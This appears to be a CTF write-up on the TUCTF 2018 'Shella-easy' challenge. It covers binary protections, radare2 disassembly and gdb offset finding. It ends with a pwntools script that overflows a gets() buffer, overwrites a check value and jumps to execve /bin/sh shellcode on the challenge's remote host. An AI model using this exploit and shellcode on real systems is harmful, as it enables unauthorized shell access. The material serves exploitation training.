I"aî<h2>TUCTF18(Shelleasy, 345 pt)</h2>
<p>In this challange we have to overwrite variable to 0xdeadbeef and after that inject 32 bit shellcode to stack thats it.<br /><br /></p>

<p><strong>STEP-1</strong><br />
Binary protection and file type :</p>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">dr3dd</span><span class="o">@</span><span class="n">dr3dd</span><span class="o">-</span><span class="n">Aspire</span><span class="o">-</span><span class="n">F5</span><span class="m">-573</span><span class="n">G</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="o">~/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="n">shella</span><span class="o">-</span><span class="n">easy</span><span class="w"> 
</span><span class="n">shella</span><span class="o">-</span><span class="n">easy</span><span class="o">:</span><span class="w"> </span><span class="n">ELF</span><span class="w"> </span><span class="m">32</span><span class="o">-</span><span class="n">bit</span><span class="w"> </span><span class="n">LSB</span><span class="w"> </span><span class="n">executable</span><span class="p">,</span><span class="w"> </span><span class="n">Intel</span><span class="w"> </span><span class="m">80386</span><span class="p">,</span><span class="w"> </span><span class="n">version</span><span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="p">(</span><span class="n">SYSV</span><span class="p">),</span><span class="w"> </span><span class="n">dynamically</span><span class="w"> </span><span class="n">linked</span><span class="p">,</span><span class="w"> </span><span class="n">interpreter</span><span class="w"> </span><span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">ld</span><span class="o">-</span><span class="n">linux.so.2</span><span class="p">,</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">GNU</span><span class="o">/</span><span class="n">Linux</span><span class="w"> </span><span class="m">2.6.32</span><span class="p">,</span><span class="w"> </span><span class="n">BuildID</span><span class="p">[</span><span class="n">sha1</span><span class="w"> </span><span class="o">=</span><span class="m">38</span><span class="n">de2077277362023aadd2209673b21577463b66</span><span class="p">,</span><span class="w"> </span><span class="n">not</span><span class="w"> </span><span class="n">stripped</span><span class="w">
</span><span class="n">dr3dd</span><span class="o">@</span><span class="n">dr3dd</span><span class="o">-</span><span class="n">Aspire</span><span class="o">-</span><span class="n">F5</span><span class="m">-573</span><span class="n">G</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="o">~/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> 
</span></code></pre></div></div>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">dr3dd</span><span class="o">@</span><span class="n">dr3dd</span><span class="o">-</span><span class="n">Aspire</span><span class="o">-</span><span class="n">F5</span><span class="m">-573</span><span class="n">G</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="o">~/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="n">checksec</span><span class="w"> </span><span class="n">shella</span><span class="o">-</span><span class="n">easy</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="s1">'/home/dr3dd/ctf-2018/TUctf18/shelleasy/shella-easy'</span><span class="w">
   </span><span class="n">Arch</span><span class="o">:</span><span class="w">     </span><span class="n">i386</span><span class="m">-32</span><span class="o">-</span><span class="n">little</span><span class="w">
   </span><span class="n">RELRO</span><span class="o">:</span><span class="w">    </span><span class="n">Partial</span><span class="w"> </span><span class="n">RELRO</span><span class="w">
   </span><span class="n">Stack</span><span class="o">:</span><span class="w">    </span><span class="n">No</span><span class="w"> </span><span class="n">canary</span><span class="w"> </span><span class="n">found</span><span class="w">
   </span><span class="n">NX</span><span class="o">:</span><span class="w">       </span><span class="n">NX</span><span class="w"> </span><span class="n">disabled</span><span class="w">
   </span><span class="n">PIE</span><span class="o">:</span><span class="w">      </span><span class="n">No</span><span class="w"> </span><span class="n">PIE</span><span class="w"> </span><span class="p">(</span><span class="mh">0x8048000</span><span class="p">)</span><span class="w">
   </span><span class="n">RWX</span><span class="o">:</span><span class="w">      </span><span class="n">Has</span><span class="w"> </span><span class="n">RWX</span><span class="w"> </span><span class="n">segments</span><span class="w">
</span><span class="n">dr3dd</span><span class="o">@</span><span class="n">dr3dd</span><span class="o">-</span><span class="n">Aspire</span><span class="o">-</span><span class="n">F5</span><span class="m">-573</span><span class="n">G</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="o">~/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> 
</span></code></pre></div></div>

<p>We can see that file is 32 bit , not stripped and NX is disable thats mean stack is executable and we can inject our shellcode to stack but there is small problem that is :</p>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">dr3dd</span><span class="o">@</span><span class="n">dr3dd</span><span class="o">-</span><span class="n">Aspire</span><span class="o">-</span><span class="n">F5</span><span class="m">-573</span><span class="n">G</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="o">~/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="n">r2</span><span class="w"> </span><span class="o">-</span><span class="n">Ad</span><span class="w"> </span><span class="n">shella</span><span class="o">-</span><span class="n">easy</span><span class="w"> 
</span><span class="n">Process</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">PID</span><span class="w"> </span><span class="m">14996</span><span class="w"> </span><span class="n">started...</span><span class="w">
</span><span class="o">=</span><span class="w"> </span><span class="n">attach</span><span class="w"> </span><span class="m">14996</span><span class="w"> </span><span class="m">14996</span><span class="w">
</span><span class="n">bin.baddr</span><span class="w"> </span><span class="mh">0x08048000</span><span class="w">
</span><span class="n">Using</span><span class="w"> </span><span class="mh">0x8048000</span><span class="w">
</span><span class="n">asm.bits</span><span class="w"> </span><span class="m">32</span><span class="w">
</span><span class="n">glibc.fc_offset</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mh">0x00148</span><span class="w">
</span><span class="p">[</span><span class="n">x</span><span class="p">]</span><span class="w"> </span><span class="n">Analyze</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">flags</span><span class="w"> </span><span class="n">starting</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">sym.</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">entry0</span><span class="w"> </span><span class="p">(</span><span class="n">aa</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="n">x</span><span class="p">]</span><span class="w"> </span><span class="n">Analyze</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="p">(</span><span class="n">aac</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="n">x</span><span class="p">]</span><span class="w"> </span><span class="n">Analyze</span><span class="w"> </span><span class="n">len</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">instructions</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">references</span><span class="w"> </span><span class="p">(</span><span class="n">aar</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="n">x</span><span class="p">]</span><span class="w"> </span><span class="n">Constructing</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">fcn.</span><span class="o">*</span><span class="w"> </span><span class="n">and</span><span class="w"> </span><span class="n">sym.func.</span><span class="o">*</span><span class="w"> </span><span class="n">functions</span><span class="w"> </span><span class="p">(</span><span class="n">aan</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="n">TOFIX</span><span class="o">:</span><span class="w"> </span><span class="n">afta</span><span class="w"> </span><span class="n">can</span><span class="s1">'t run in debugger mode.ions (afta)
[x] Type matching analysis for all functions (afta)
[x] Use -AA or aaaa to perform additional experimental analysis.
= attach 14996 14996
14996
 -- If you'</span><span class="n">re</span><span class="w"> </span><span class="n">having</span><span class="w"> </span><span class="n">fun</span><span class="w"> </span><span class="n">using</span><span class="w"> </span><span class="n">radare2</span><span class="p">,</span><span class="w"> </span><span class="n">odds</span><span class="w"> </span><span class="n">are</span><span class="w"> </span><span class="n">that</span><span class="w"> </span><span class="n">you</span><span class="s1">'re doing something wrong.
[0xf7f33c70]&gt; afl
0x0804834c    3 35           sym._init
0x08048380    1 6            sym.imp.printf
0x08048390    1 6            sym.imp.gets
0x080483a0    1 6            sym.imp.exit
0x080483b0    1 6            sym.imp.__libc_start_main
0x080483c0    1 6            sym.imp.setvbuf
0x080483d0    1 6            sub.__gmon_start_3d0
0x080483e0    1 33           entry0
0x08048410    1 4            sym.__x86.get_pc_thunk.bx
0x08048420    4 43           sym.deregister_tm_clones
0x08048450    4 53           sym.register_tm_clones
0x08048490    3 30           sym.__do_global_dtors_aux
0x080484b0    4 43   -&gt; 40   entry1.init
0x080484db    3 128          sym.main
0x08048560    4 93           sym.__libc_csu_init
0x080485c0    1 2            sym.__libc_csu_fini
0x080485c4    1 20           sym._fini
[0xf7f33c70]&gt; s main
[0x080484db]&gt; pdf
            ;-- main:
/ (fcn) sym.main 128
|   sym.main (int argc, char **argv, char **envp);
|           ; var int local_48h @ ebp-0x48
|           ; var int local_8h @ ebp-0x8
|           ; var int local_4h @ ebp-0x4
|           ; DATA XREF from entry0 (0x80483f7)
|           0x080484db      55             push ebp
|           0x080484dc      89e5           mov ebp, esp
|           0x080484de      53             push ebx
|           0x080484df      83ec44         sub esp, 0x44               ; '</span><span class="n">D</span><span class="s1">'
|           0x080484e2      e829ffffff     call sym.__x86.get_pc_thunk.bx
|           0x080484e7      81c3191b0000   add ebx, 0x1b19
|           0x080484ed      8b83fcffffff   mov eax, dword [ebx - 4]
|           0x080484f3      8b00           mov eax, dword [eax]
|           0x080484f5      6a14           push 0x14                   ; 20
|           0x080484f7      6a02           push 2                      ; 2
|           0x080484f9      6a00           push 0
|           0x080484fb      50             push eax
|           0x080484fc      e8bffeffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
|           0x08048501      83c410         add esp, 0x10
|           0x08048504      8b83f8ffffff   mov eax, dword [ebx - 8]
|           0x0804850a      8b00           mov eax, dword [eax]
|           0x0804850c      6a14           push 0x14                   ; 20
|           0x0804850e      6a02           push 2                      ; 2
|           0x08048510      6a00           push 0
|           0x08048512      50             push eax
|           0x08048513      e8a8feffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
|           0x08048518      83c410         add esp, 0x10
|           0x0804851b      c745f8bebafe.  mov dword [local_8h], 0xcafebabe
|           0x08048522      8d45b8         lea eax, [local_48h]
|           0x08048525      50             push eax
|           0x08048526      8d83e0e5ffff   lea eax, [ebx - 0x1a20]
|           0x0804852c      50             push eax
|           0x0804852d      e84efeffff     call sym.imp.printf         ; int printf(const char *format)
|           0x08048532      83c408         add esp, 8
|           0x08048535      8d45b8         lea eax, [local_48h]
|           0x08048538      50             push eax
|           0x08048539      e852feffff     call sym.imp.gets           ; char *gets(char *s)
|           0x0804853e      83c404         add esp, 4
|           0x08048541      817df8efbead.  cmp dword [local_8h], 0xdeadbeef
|       ,=&lt; 0x08048548      7407           je 0x8048551
|       |   0x0804854a      6a00           push 0
|       |   0x0804854c      e84ffeffff     call sym.imp.exit           ; void exit(int status)
|       `-&gt; 0x08048551      b800000000     mov eax, 0
|           0x08048556      8b5dfc         mov ebx, dword [local_4h]
|           0x08048559      c9             leave
\           0x0804855a      c3             ret
[0x080484db]&gt; pdc
function sym.main () {
    //  3 basic blocks

    loc_0x80484db:

       //DATA XREF from entry0 (0x80483f7)
       push ebp
       ebp = esp
       push ebx
       esp -= 0x44              //'</span><span class="n">D</span><span class="s1">'
       sym.__x86.get_pc_thunk.bx ()
       ebx += 0x1b19            //obj._GLOBAL_OFFSET_TABLE
       eax = dword [ebx - 4]
       eax = dword [eax]
       push 0x14                //20
       push 2                   //2
       push 0
       push eax
                                                    
       int setvbuf(FILE* : unk_format, char * buf : (*0x0) NULL, int mode : (*0x2)0x00177fac = 4294967295, size_t size : (*0x14)0x00177fb0 = 4294967295)
       esp += 0x10
       eax = dword [ebx - 8]
       eax = dword [eax]
       push 0x14                //20
       push 2                   //2
       push 0
       push eax
                                                    
       int setvbuf(FILE* : unk_format, char * buf : (*0x0) NULL, int mode : (*0x2)0x00177fac = 4294967295, size_t size : (*0x14)0x00177fb0 = 4294967295)
       esp += 0x10
       dword [local_8h] = 0xcafebabe
       eax = [local_48h]
       push eax
       eax = [ebx - 0x1a20]     //str.Yeah_I_ll_have_a__p_with_a_side_of_fries_thanks
       push eax                 //(pstr 0x080485e0) "Yeah I'</span><span class="n">ll</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="o">%p with a side of fries thanks\n"
                                                   
       int printf(const char * format : (*0x80485e0)0x00177fac = Yeah I'll have a %</span><span class="n">p</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">side</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">fries</span><span class="w"> </span><span class="n">thanks.</span><span class="p">)</span><span class="w">
       </span><span class="n">esp</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="m">8</span><span class="w">
       </span><span class="n">eax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">local_48h</span><span class="p">]</span><span class="w">
       </span><span class="n">push</span><span class="w"> </span><span class="n">eax</span><span class="w">
                                </span><span class="o">//</span><span class="p">(</span><span class="n">pstr</span><span class="w"> </span><span class="mh">0x080485e0</span><span class="p">)</span><span class="w"> </span><span class="err">"</span><span class="n">Yeah</span><span class="w"> </span><span class="n">I</span><span class="err">'</span><span class="n">ll</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="o">%</span><span class="n">p</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">side</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">f</span><span class="w">                                         
       </span><span class="n">char</span><span class="w"> </span><span class="o">*</span><span class="n">gets</span><span class="p">(</span><span class="n">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">s</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="mh">0x177fb4</span><span class="p">)</span><span class="mh">0x00177fb0</span><span class="w"> </span><span class="o">=</span><span class="p">)</span><span class="w">
       </span><span class="n">esp</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="m">4</span><span class="w">
       </span><span class="n">var</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dword</span><span class="w"> </span><span class="p">[</span><span class="n">local_8h</span><span class="p">]</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mh">0xdeadbeef</span><span class="w">
       </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">var</span><span class="p">)</span><span class="w"> </span><span class="n">goto</span><span class="w"> </span><span class="mh">0x8048551</span><span class="w"> </span><span class="o">//</span><span class="n">unlikely</span><span class="w">
       </span><span class="p">{</span><span class="w">
        </span><span class="n">loc_0x8048551</span><span class="o">:</span><span class="w">

           </span><span class="n">eax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="m">0</span><span class="w">
           </span><span class="n">ebx</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dword</span><span class="w"> </span><span class="p">[</span><span class="n">local_4h</span><span class="p">]</span><span class="w">   </span><span class="o">//</span><span class="n">ebp</span><span class="w">
           </span><span class="n">leave</span><span class="w">                    </span><span class="o">//</span><span class="n">ebp</span><span class="w">
           </span><span class="n">return</span><span class="w">
        </span><span class="n">loc_0x804854a</span><span class="o">:</span><span class="w">

           </span><span class="n">push</span><span class="w"> </span><span class="m">0</span><span class="w">
                                                     
           </span><span class="n">void</span><span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">int</span><span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="mh">0x0</span><span class="p">)</span><span class="w"> </span><span class="kc">NULL</span><span class="p">)</span><span class="w">
      </span><span class="p">}</span><span class="w">
      </span><span class="n">return</span><span class="p">;</span><span class="w">

</span><span class="p">}</span><span class="w">
</span><span class="p">[</span><span class="mh">0x080484db</span><span class="p">]</span><span class="o">&gt;</span><span class="w"> 
</span></code></pre></div></div>

<p><strong>STEP-2</strong><br />
After getting psudo code in radare2 by command ‚Äòpdc‚Äô we can see that at variable <strong>dword [local_8h] = 0xcafebabe</strong> after that 
it checks</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">var</span> <span class="o">=</span> <span class="n">dword</span> <span class="p">[</span><span class="n">local_8h</span><span class="p">]</span> <span class="o">-</span> <span class="mh">0xdeadbeef</span>
       <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">var</span><span class="p">)</span> <span class="k">goto</span> <span class="mh">0x8048551</span>
</code></pre></div></div>
<p>if dword <strong>[local_8h]</strong> is not equal to <strong>0xdeadbeef</strong> then program exit. so our first target to modify  <strong>dword [local_8h]</strong> 
to <strong>0xdeadbeef</strong> after that inject our shellcode.
So we have to find offset where it overwrites that variable.</p>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">|</span><span class="w">           </span><span class="mh">0x08048535</span><span class="w">      </span><span class="m">8</span><span class="n">d45b8</span><span class="w">         </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">local_48h</span><span class="p">]</span><span class="w">
</span><span class="o">|</span><span class="w">           </span><span class="mh">0x08048538</span><span class="w">      </span><span class="m">50</span><span class="w">             </span><span class="n">push</span><span class="w"> </span><span class="n">eax</span><span class="w">
</span><span class="o">|</span><span class="w">           </span><span class="mh">0x08048539</span><span class="w">      </span><span class="n">e852feffff</span><span class="w">     </span><span class="n">call</span><span class="w"> </span><span class="n">sym.imp.gets</span><span class="w"> 
</span></code></pre></div></div>
<p>Our input save in <strong>[local_48h]</strong> and variable we have to change is at <strong>[local_8h]</strong> so offset is 0x48-0x8 = 64.
So if we send <strong>‚ÄúA‚Äù*64 + ‚Äú\xef\xbe\xad\xde‚Äù</strong> then <strong>[local_8h]</strong> get changed to <strong>0xdeadbeef</strong> and that‚Äôs our first target.</p>

<p><strong>STEP-3</strong></p>

<p>Now we have to find next offset where we can overwrite return address so that we can jump to the shellcode. in gdb we can do 
it by simple commands .</p>

<p>We create a simple cyclic pattern with gdb-peda</p>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="o">$</span><span class="w"> </span><span class="n">pattern_create</span><span class="w"> </span><span class="m">50</span><span class="w">
</span><span class="s1">'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'</span><span class="w">
</span></code></pre></div></div>

<p>After that We send it like this :</p>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="o">$</span><span class="w"> </span><span class="n">r</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="o">&lt;</span><span class="p">(</span><span class="n">python</span><span class="w"> </span><span class="o">-</span><span class="n">c</span><span class="w"> </span><span class="s1">'print "A"*64 + "\xef\xbe\xad\xde"+ "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"'</span><span class="p">)</span><span class="w">
</span><span class="n">Starting</span><span class="w"> </span><span class="n">program</span><span class="o">:</span><span class="w"> </span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">dr3dd</span><span class="o">/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="o">/</span><span class="n">shella</span><span class="o">-</span><span class="n">easy</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="o">&lt;</span><span class="p">(</span><span class="n">python</span><span class="w"> </span><span class="o">-</span><span class="n">c</span><span class="w"> </span><span class="s1">'print "A"*64 + "\xef\xbe\xad\xde"+ "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"'</span><span class="p">)</span><span class="w">
</span><span class="n">Yeah</span><span class="w"> </span><span class="n">I</span><span class="s1">'ll have a 0xffffcf90 with a side of fries thanks

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x25414141 ('</span><span class="n">AAA</span><span class="o">%</span><span class="s1">')
ECX: 0xf7fa25c0 --&gt; 0xfbad208b 
EDX: 0xf7fa389c --&gt; 0x0 
ESI: 0xf7fa2000 --&gt; 0x1d7d6c 
EDI: 0x0 
EBP: 0x41734141 ('</span><span class="n">AAsA</span><span class="s1">')
ESP: 0xffffcfe0 ("$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA")
EIP: 0x41414241 ('</span><span class="n">ABAA</span><span class="err">'</span><span class="p">)</span><span class="w">
</span><span class="n">EFLAGS</span><span class="o">:</span><span class="w"> </span><span class="mh">0x10246</span><span class="w"> </span><span class="p">(</span><span class="n">carry</span><span class="w"> </span><span class="n">PARITY</span><span class="w"> </span><span class="n">adjust</span><span class="w"> </span><span class="n">ZERO</span><span class="w"> </span><span class="n">sign</span><span class="w"> </span><span class="n">trap</span><span class="w"> </span><span class="n">INTERRUPT</span><span class="w"> </span><span class="n">direction</span><span class="w"> </span><span class="n">overflow</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="o">-------------------------------------</span><span class="n">code</span><span class="o">-------------------------------------</span><span class="p">]</span><span class="w">
</span><span class="n">Invalid</span><span class="w"> </span><span class="o">$</span><span class="n">PC</span><span class="w"> </span><span class="n">address</span><span class="o">:</span><span class="w"> </span><span class="mh">0x41414241</span><span class="w">
</span><span class="p">[</span><span class="o">------------------------------------</span><span class="n">stack</span><span class="o">-------------------------------------</span><span class="p">]</span><span class="w">
</span><span class="m">0000</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcfe0</span><span class="w"> </span><span class="p">(</span><span class="s2">"$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0004</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcfe4</span><span class="w"> </span><span class="p">(</span><span class="s2">"AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0008</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcfe8</span><span class="w"> </span><span class="p">(</span><span class="s2">"A-AA(AADAA;AA)AAEAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0012</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcfec</span><span class="w"> </span><span class="p">(</span><span class="s2">"(AADAA;AA)AAEAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0016</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcff0</span><span class="w"> </span><span class="p">(</span><span class="s2">"AA;AA)AAEAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0020</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcff4</span><span class="w"> </span><span class="p">(</span><span class="s2">"A)AAEAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0024</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcff8</span><span class="w"> </span><span class="p">(</span><span class="s2">"EAAaAA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="m">0028</span><span class="o">|</span><span class="w"> </span><span class="mh">0xffffcffc</span><span class="w"> </span><span class="p">(</span><span class="s2">"AA0AAFAAbA"</span><span class="p">)</span><span class="w">
</span><span class="p">[</span><span class="o">------------------------------------------------------------------------------</span><span class="p">]</span><span class="w">
</span><span class="n">Legend</span><span class="o">:</span><span class="w"> </span><span class="n">code</span><span class="p">,</span><span class="w"> </span><span class="n">data</span><span class="p">,</span><span class="w"> </span><span class="n">rodata</span><span class="p">,</span><span class="w"> </span><span class="n">value</span><span class="w">
</span><span class="n">Stopped</span><span class="w"> </span><span class="n">reason</span><span class="o">:</span><span class="w"> </span><span class="n">SIGSEGV</span><span class="w">
</span><span class="mh">0x41414241</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="o">??</span><span class="w"> </span><span class="p">()</span><span class="w">
</span><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="o">$</span><span class="w"> </span><span class="n">pattern_offset</span><span class="w"> </span><span class="n">ABAA</span><span class="w">
</span><span class="n">ABAA</span><span class="w"> </span><span class="n">found</span><span class="w"> </span><span class="n">at</span><span class="w"> </span><span class="n">offset</span><span class="o">:</span><span class="w"> </span><span class="m">8</span><span class="w">
</span><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="o">$</span><span class="w"> 
</span></code></pre></div></div>
<p>We can see the offset is 8.</p>

<p>So final script is:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1"># p = process('./shella-easy')
</span><span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'52.15.182.55'</span> <span class="p">,</span><span class="mi">12345</span><span class="p">)</span>

<span class="c1"># gdb.attach(p,'''
# break *0x08048541
# ''')
</span>
<span class="n">shellcode</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">20</span><span class="o">+</span><span class="s">"</span><span class="se">\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80</span><span class="s">"</span>

<span class="n">a</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">()[</span><span class="mi">17</span><span class="p">:</span><span class="mi">27</span><span class="p">],</span><span class="mi">16</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">shellcode</span>
<span class="n">payload</span> <span class="o">+=</span>  <span class="s">"A"</span><span class="o">*</span><span class="p">(</span><span class="mi">64</span><span class="o">-</span><span class="mi">48</span><span class="p">)</span> <span class="o">+</span><span class="s">"</span><span class="se">\xef\xbe\xad\xde</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">8</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>
<p>And We get the shell..!!</p>

<div class="language-s highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="w"> </span><span class="err">‚öô</span><span class="w"> </span><span class="n">dr3dd</span><span class="o">@</span><span class="n">dr3dd</span><span class="o">-</span><span class="n">Aspire</span><span class="o">-</span><span class="n">F5</span><span class="m">-573</span><span class="n">G</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="o">~/</span><span class="n">ctf</span><span class="m">-2018</span><span class="o">/</span><span class="n">TUctf18</span><span class="o">/</span><span class="n">shelleasy</span><span class="w"> </span><span class="err">ÓÇ∞</span><span class="w"> </span><span class="n">python</span><span class="w"> </span><span class="n">sol.py</span><span class="w">
</span><span class="p">[</span><span class="o">+</span><span class="p">]</span><span class="w"> </span><span class="n">Starting</span><span class="w"> </span><span class="n">local</span><span class="w"> </span><span class="n">process</span><span class="w"> </span><span class="s1">'./shella-easy'</span><span class="o">:</span><span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="m">17147</span><span class="w">
</span><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">Switching</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">interactive</span><span class="w"> </span><span class="n">mode</span><span class="w">
</span><span class="o">$</span><span class="w"> </span><span class="n">ls</span><span class="w">
</span><span class="n">core</span><span class="w">  </span><span class="n">exp</span><span class="w">  </span><span class="n">flag</span><span class="w">  </span><span class="n">peda</span><span class="o">-</span><span class="n">session</span><span class="o">-</span><span class="n">shella</span><span class="o">-</span><span class="n">easy.txt</span><span class="w">  </span><span class="n">shella</span><span class="o">-</span><span class="n">easy</span><span class="w">  </span><span class="n">sol.py</span><span class="w">
</span><span class="o">$</span><span class="w"> </span><span class="n">cat</span><span class="w"> </span><span class="n">flag</span><span class="w">
